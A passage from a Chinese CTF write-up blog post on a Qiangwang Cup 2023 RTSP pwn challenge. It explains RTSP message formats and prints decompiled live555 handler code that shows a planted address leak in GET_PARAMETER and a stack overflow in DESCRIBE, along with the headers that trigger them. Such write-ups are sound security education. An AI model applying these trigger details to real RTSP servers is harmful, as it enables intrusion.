<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="协议服务器类题目">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2023两道题">
<meta property="og:url" content="https://ixout.github.io/posts/36820/index.html">
<meta property="og:site_name" content="ixout&#39;s blog">
<meta property="og:description" content="协议服务器类题目">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ixout/ixout.github.io@main/img/2024-04-23_221908.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ixout/ixout.github.io@main/img/2024-04-23_223449.png">
<meta property="article:published_time" content="2024-04-23T13:48:22.000Z">
<meta property="article:modified_time" content="2024-11-20T14:11:46.239Z">
<meta property="article:author" content="ixout">
<meta property="article:tag" content="协议">
<meta property="article:tag" content="server">
<meta property="article:tag" content="rtsp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/ixout/ixout.github.io@main/img/2024-04-23_221908.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
        
      
    
    <!-- title -->
    <title>强网杯2023两道题</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ixout's blog" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/posts/5022/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/posts/28098/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://ixout.github.io/posts/36820/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://ixout.github.io/posts/36820/&text=强网杯2023两道题"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ixout.github.io/posts/36820/&is_video=false&description=强网杯2023两道题"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=强网杯2023两道题&body=Check out this article: https://ixout.github.io/posts/36820/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://ixout.github.io/posts/36820/&title=强网杯2023两道题"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://ixout.github.io/posts/36820/&name=强网杯2023两道题&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://ixout.github.io/posts/36820/&t=强网杯2023两道题"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#A-rtsp"><span class="toc-number">1.</span> <span class="toc-text">A-rtsp</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#rtsp"><span class="toc-number">1.1.</span> <span class="toc-text">rtsp</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8A%A5%E6%96%87%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.1.1.</span> <span class="toc-text">报文格式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.2.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8B%BE%E9%81%97"><span class="toc-number">1.3.</span> <span class="toc-text">拾遗</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#simpleinterpreter"><span class="toc-number">2.</span> <span class="toc-text">simpleinterpreter</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        强网杯2023两道题
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">ixout</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-04-23T13:48:22.000Z" class="dt-published" itemprop="datePublished">2024-04-23</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/pwn/">pwn</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/rtsp/" rel="tag">rtsp</a>, <a class="p-category" href="/tags/server/" rel="tag">server</a>, <a class="p-category" href="/tags/%E5%8D%8F%E8%AE%AE/" rel="tag">协议</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="A-rtsp"><a href="#A-rtsp" class="headerlink" title="A-rtsp"></a>A-rtsp</h1><h2 id="rtsp"><a href="#rtsp" class="headerlink" title="rtsp"></a>rtsp</h2><p>通过搜索字符串rtsp可以知道采用的标准是rtsp1.0</p>
<p><img src="https://cdn.jsdelivr.net/gh/ixout/ixout.github.io@main/img/2024-04-23_221908.png" alt=""></p>
<p>对应的RFC是<a target="_blank" rel="noopener" href="https://www.rfc-editor.org/rfc/rfc2326.html">RFC 2326: Real Time Streaming Protocol (RTSP) (rfc-editor.org)</a></p>
<p>同时参考<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/478736595">最详细的音视频流媒体传输协议-rtsp协议详解 - 知乎 (zhihu.com)</a>这篇文章</p>
<p>rtsp协议是啥</p>
<blockquote>
<p>RTSP全称实时流协议（Real Time Streaming Protocol），它是一个网络控制协议，设计用于娱乐、会议系统中控制流媒体服务器。RTSP用于在希望通讯的两端建立并控制媒体会话（session），客户端通过发出VCR-style命令如play、record和pause等来实时控制媒体流。</p>
</blockquote>
<p>RTSP协议采用客户服务器(CS)方式工作</p>
<h3 id="报文格式"><a href="#报文格式" class="headerlink" title="报文格式"></a>报文格式</h3><p><strong>RTSP客户端的请求格式</strong></p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">method url vesion\r\n</span><br><span class="line">CSeq: x\r\n</span><br><span class="line">xxx\r\n</span><br><span class="line">...</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
<ul>
<li>method：方法，表明这次请求的方法</li>
<li>url：<strong>格式一般为rtsp://ip:port/session</strong>，ip表主机ip，port表端口好，如果不写那么就是默认端口，rtsp的默认端口为554，session表明请求哪一个会话</li>
<li>version：表示rtsp的版本，现在为RTSP/1.0</li>
<li>CSeq：序列号，每个RTSP请求和响应都对应一个序列号，序列号是递增的</li>
</ul>
<p>一个实例</p>
<p><img src="https://cdn.jsdelivr.net/gh/ixout/ixout.github.io@main/img/2024-04-23_223449.png" alt=""></p>
<p>请求方法有OPTIONS、DESCRIBE、SETUP、TEARDOWN、PLAY、PAUSE、GET_PARAMETER和SET_PARAMETER。</p>
<p><strong>RTSP服务端的响应格式</strong></p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vesion 200 OK\r\n</span><br><span class="line">CSeq: x\r\n</span><br><span class="line">xxx\r\n</span><br><span class="line">...</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
<ul>
<li>version：表示rtsp的版本，现在为RTSP/1.0</li>
<li>CSeq：序列号，这个必须与对应请求的序列号相同</li>
</ul>
<p>状态码</p>
<ul>
<li>1xx：信息-已收到请求，正在继续处理</li>
<li>2xx：成功-成功接收、理解和接受操作</li>
<li>3xx：重定向-必须执行进一步操作才能完成请求</li>
<li>4xx：客户端错误-请求包含错误语法或无法实现</li>
<li>5xx：服务器错误-服务器未能完成明显有效的请求</li>
</ul>
<hr>
<p>更多可以另行学习,对于本题这些知识就够了</p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>程序ida打开,哦豁是c++写的,又需要万恶的c++逆向(不过总比rust和go要好)</p>
<p>万幸的是没有去除符号</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int64 v3; <span class="comment">// rbx</span></span><br><span class="line">  __int64 (__fastcall *v4)(__int64, __int64); <span class="comment">// r12</span></span><br><span class="line">  __int64 v5; <span class="comment">// rax</span></span><br><span class="line">  __int64 v6; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">unsigned</span> __int8 v7; <span class="comment">// r8</span></span><br><span class="line">  ServerMediaSubsession *v8; <span class="comment">// rax</span></span><br><span class="line">  __int64 v9; <span class="comment">// rax</span></span><br><span class="line">  __int16 v11; <span class="comment">// [rsp+14h] [rbp-4Ch] BYREF</span></span><br><span class="line">  <span class="type">char</span> v12; <span class="comment">// [rsp+17h] [rbp-49h]</span></span><br><span class="line">  ServerMediaSession *v13; <span class="comment">// [rsp+18h] [rbp-48h]</span></span><br><span class="line">  UsageEnvironment *v14; <span class="comment">// [rsp+20h] [rbp-40h]</span></span><br><span class="line">  UsageEnvironment *v15; <span class="comment">// [rsp+28h] [rbp-38h]</span></span><br><span class="line">  <span class="type">char</span> *v16; <span class="comment">// [rsp+30h] [rbp-30h]</span></span><br><span class="line">  RTSPServer *v17; <span class="comment">// [rsp+38h] [rbp-28h]</span></span><br><span class="line">  __int64 v18; <span class="comment">// [rsp+40h] [rbp-20h]</span></span><br><span class="line">  BasicUsageEnvironment *New; <span class="comment">// [rsp+48h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  New = (BasicUsageEnvironment *)BasicTaskScheduler::createNew(</span><br><span class="line">                                   (BasicTaskScheduler *)&amp;stru_2708.r_info,</span><br><span class="line">                                   (<span class="type">unsigned</span> <span class="type">int</span>)argv);</span><br><span class="line">  env = (UsageEnvironment *)BasicUsageEnvironment::createNew(New, (TaskScheduler *)argv);</span><br><span class="line">  v18 = <span class="number">0LL</span>;</span><br><span class="line">  Port::Port((Port *)&amp;v11, <span class="number">0x216A</span>u);</span><br><span class="line">  v17 = (RTSPServer *)RTSPServer::createNew(env, (<span class="type">unsigned</span> __int16)v11, v18, <span class="number">65LL</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !v17 )</span><br><span class="line">  &#123;</span><br><span class="line">    v3 = (*(__int64 (__fastcall **)(UsageEnvironment *, <span class="type">const</span> <span class="type">char</span> *))(*(_QWORD *)env + <span class="number">72LL</span>))(</span><br><span class="line">           env,</span><br><span class="line">           <span class="string">&quot;Failed to create RTSP server: &quot;</span>);</span><br><span class="line">    v4 = *(__int64 (__fastcall **)(__int64, __int64))(*(_QWORD *)v3 + <span class="number">72LL</span>);</span><br><span class="line">    v5 = (**(__int64 (__fastcall ***)(UsageEnvironment *))env)(env);</span><br><span class="line">    v6 = v4(v3, v5);</span><br><span class="line">    (*(<span class="type">void</span> (__fastcall **)(__int64, <span class="type">const</span> <span class="type">char</span> *))(*(_QWORD *)v6 + <span class="number">72LL</span>))(v6, <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  v16 = <span class="string">&quot;Session streamed by \&quot;testOnDemandRTSPServer\&quot;&quot;</span>;</span><br><span class="line">  v15 = (UsageEnvironment *)<span class="string">&quot;wavAudioTest&quot;</span>;</span><br><span class="line">  v14 = (UsageEnvironment *)<span class="string">&quot;test.wav&quot;</span>;</span><br><span class="line">  v13 = (ServerMediaSession *)ServerMediaSession::createNew(</span><br><span class="line">                                env,</span><br><span class="line">                                (UsageEnvironment *)<span class="string">&quot;wavAudioTest&quot;</span>,</span><br><span class="line">                                <span class="string">&quot;wavAudioTest&quot;</span>,</span><br><span class="line">                                <span class="string">&quot;Session streamed by \&quot;testOnDemandRTSPServer\&quot;&quot;</span>,</span><br><span class="line">                                <span class="number">0LL</span>,</span><br><span class="line">                                <span class="number">0</span>,</span><br><span class="line">                                (<span class="type">const</span> <span class="type">char</span> *)argv);</span><br><span class="line">  v12 = <span class="number">0</span>;</span><br><span class="line">  v8 = (ServerMediaSubsession *)WAVAudioFileServerMediaSubsession::createNew(</span><br><span class="line">                                  env,</span><br><span class="line">                                  v14,</span><br><span class="line">                                  (<span class="type">const</span> <span class="type">char</span> *)(<span class="type">unsigned</span> __int8)reuseFirstSource,</span><br><span class="line">                                  <span class="number">0</span>,</span><br><span class="line">                                  v7);</span><br><span class="line">  ServerMediaSession::addSubsession(v13, v8);</span><br><span class="line">  (*(<span class="type">void</span> (__fastcall **)(RTSPServer *, ServerMediaSession *))(*(_QWORD *)v17 + <span class="number">72LL</span>))(v17, v13);</span><br><span class="line">  announceStream(v17, v13, (<span class="type">const</span> <span class="type">char</span> *)v15, (<span class="type">const</span> <span class="type">char</span> *)v14);</span><br><span class="line">  v9 = UsageEnvironment::taskScheduler(env);</span><br><span class="line">  (*(<span class="type">void</span> (__fastcall **)(__int64, _QWORD))(*(_QWORD *)v9 + <span class="number">56LL</span>))(v9, <span class="number">0LL</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到有很多没见过的类,搜索一下<code>BasicTaskScheduler</code>,找到关键词<code>live555</code></p>
<p>继续搜索<code>live555</code>,<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/678497370">基于Live555框架实现一个实时流媒体服务 - 知乎 (zhihu.com)</a>,可以知道live555是rtsp协议的一种实现</p>
<p>现在我们有两种办法向下继续分析</p>
<ol>
<li><p>既然找到了live555开源项目,那么这类题一般都是在原有代码的基础上做一些修改,所以我们可以自己编译一个live555,然后通过bindiff来找到这些函数</p>
</li>
<li><p>第二种方法是比较看观察能力的,而且并不具备普适性,通过找到后门提示中的字符串来定位关键漏洞函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.rodata:000000000007B39B	0000001C	C	100 maybe you need this %p\n</span><br><span class="line">.rodata:000000000007B3C8	00000022	C	100 you may want to get more flag</span><br><span class="line">.rodata:000000000007B40B	0000000C	C	vul_string:</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>总之关键就是在于定位到漏洞函数</p>
<p>在GET_PARAMETER中存在泄露</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall RTSPServer::RTSPClientConnection::handleCmd_GET_PARAMETER(</span><br><span class="line">        RTSPServer::RTSPClientConnection *this,</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *a2,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> a3)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">32</span>]; <span class="comment">// [rsp+20h] [rbp-100h] BYREF</span></span><br><span class="line">  <span class="type">char</span> s1[<span class="number">215</span>]; <span class="comment">// [rsp+40h] [rbp-E0h] BYREF</span></span><br><span class="line">  <span class="type">char</span> v7; <span class="comment">// [rsp+117h] [rbp-9h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v8; <span class="comment">// [rsp+118h] [rbp-8h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> i; <span class="comment">// [rsp+11Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  s1[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; (<span class="type">int</span>)(a3 - <span class="number">9</span>) &gt; (<span class="type">int</span>)i; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !strncasecmp(<span class="string">&quot;GET_INFO:&quot;</span>, &amp;a2[i], <span class="number">9uLL</span>) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">for</span> ( i += <span class="number">9</span>; i &lt; a3 &amp;&amp; (a2[i] == <span class="string">&#x27; &#x27;</span> || a2[i] == <span class="number">9</span>); ++i )</span><br><span class="line">        ;</span><br><span class="line">      v8 = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">while</span> ( v8 &lt;= <span class="number">3</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        v7 = a2[i];</span><br><span class="line">        s1[v8++] = v7;</span><br><span class="line">        ++i;</span><br><span class="line">      &#125;</span><br><span class="line">      s1[v8] = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">strcmp</span>(s1, <span class="string">&quot;2023&quot;</span>) )</span><br><span class="line">    <span class="keyword">return</span> RTSPServer::RTSPClientConnection::setRTSPResponse(this, <span class="string">&quot;100 you may want to get more flag&quot;</span>, <span class="string">&quot;2023.03.30&quot;</span>);</span><br><span class="line">  <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="number">0x14</span>uLL);</span><br><span class="line">  <span class="built_in">sprintf</span>(s, <span class="string">&quot;100 maybe you need this %p\n&quot;</span>, &amp;gift);</span><br><span class="line">  <span class="keyword">return</span> RTSPServer::RTSPClientConnection::setRTSPResponse(this, s, <span class="string">&quot;2023.03.30&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>需要传输一个标签<code>GET_INFO</code>,值为<code>2023</code></p>
<p>在DESCRIBE中存在栈溢出漏洞</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> __fastcall RTSPServer::RTSPClientConnection::handleCmd_DESCRIBE(</span><br><span class="line">        RTSPServer::RTSPClientConnection *this,</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *a2,</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *a3,</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *a4)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// edx</span></span><br><span class="line">  <span class="type">char</span> result; <span class="comment">// al</span></span><br><span class="line">  <span class="type">char</span> dest[<span class="number">406</span>]; <span class="comment">// [rsp+20h] [rbp-1A0h] BYREF</span></span><br><span class="line">  <span class="type">char</span> v9; <span class="comment">// [rsp+1B6h] [rbp-Ah]</span></span><br><span class="line">  <span class="type">char</span> v10; <span class="comment">// [rsp+1B7h] [rbp-9h]</span></span><br><span class="line">  <span class="type">int</span> v11; <span class="comment">// [rsp+1B8h] [rbp-8h]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+1BCh] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  dest[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( *a2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">strcat</span>(dest, a2);</span><br><span class="line">    *(_WORD *)&amp;dest[<span class="built_in">strlen</span>(dest)] = <span class="number">47</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">strcat</span>(dest, a3);</span><br><span class="line">  <span class="keyword">if</span> ( *((_DWORD *)this + <span class="number">10084</span>) == <span class="number">3</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; ; ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      v4 = <span class="built_in">strlen</span>(a4) - <span class="number">11</span>;</span><br><span class="line">      result = i;</span><br><span class="line">      <span class="keyword">if</span> ( v4 &lt;= i )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">if</span> ( !strncasecmp(<span class="string">&quot;vul_string:&quot;</span>, &amp;a4[i], <span class="number">0xB</span>uLL) )</span><br><span class="line">      &#123;</span><br><span class="line">        i += <span class="number">11</span>;</span><br><span class="line">        v11 = <span class="built_in">strlen</span>(dest) - <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          v10 = a4[i];</span><br><span class="line">          v9 = a4[i + <span class="number">1</span>];</span><br><span class="line">          <span class="keyword">if</span> ( v10 == <span class="number">13</span> &amp;&amp; v9 == <span class="number">10</span> )</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">          dest[v11++] = v10;</span><br><span class="line">          ++i;</span><br><span class="line">        &#125;</span><br><span class="line">        result = v11;</span><br><span class="line">        dest[v11] = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    result = (<span class="type">unsigned</span> __int8)RTSPServer::RTSPClientConnection::authenticationOK(this, <span class="string">&quot;DESCRIBE&quot;</span>, dest, a4) == <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ( !result )</span><br><span class="line">      <span class="keyword">return</span> (*(__int64 (__fastcall **)(_QWORD, <span class="type">char</span> *, __int64 (__fastcall *)(RTSPServer::RTSPClientConnection *__hidden, <span class="type">void</span> *, ServerMediaSession *), RTSPServer::RTSPClientConnection *, __int64))(**((_QWORD **)this + <span class="number">1</span>) + <span class="number">80LL</span>))(</span><br><span class="line">               *((_QWORD *)this + <span class="number">1</span>),</span><br><span class="line">               dest,</span><br><span class="line">               RTSPServer::RTSPClientConnection::DESCRIBELookupCompletionFunction,</span><br><span class="line">               this,</span><br><span class="line">               <span class="number">1LL</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但需要满足一个条件,即<code>if ( *((_DWORD *)this + 10084) == 3 )</code></p>
<p>这个可以在SET_PARAMETER中实现,传输一个标签<code>DESCRIBE_FLAG</code>,值为<code>flag</code></p>
